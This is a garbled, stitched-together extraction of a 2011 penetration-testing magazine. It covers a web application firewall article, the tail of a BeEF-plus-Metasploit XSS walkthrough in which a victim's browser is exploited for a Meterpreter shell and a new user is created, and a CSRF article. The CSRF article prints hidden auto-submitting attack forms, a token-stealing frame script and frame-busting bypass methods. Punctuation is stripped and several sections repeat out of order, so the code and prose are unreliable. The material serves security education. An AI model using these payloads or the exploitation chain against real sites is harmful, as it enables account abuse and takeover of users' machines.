bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
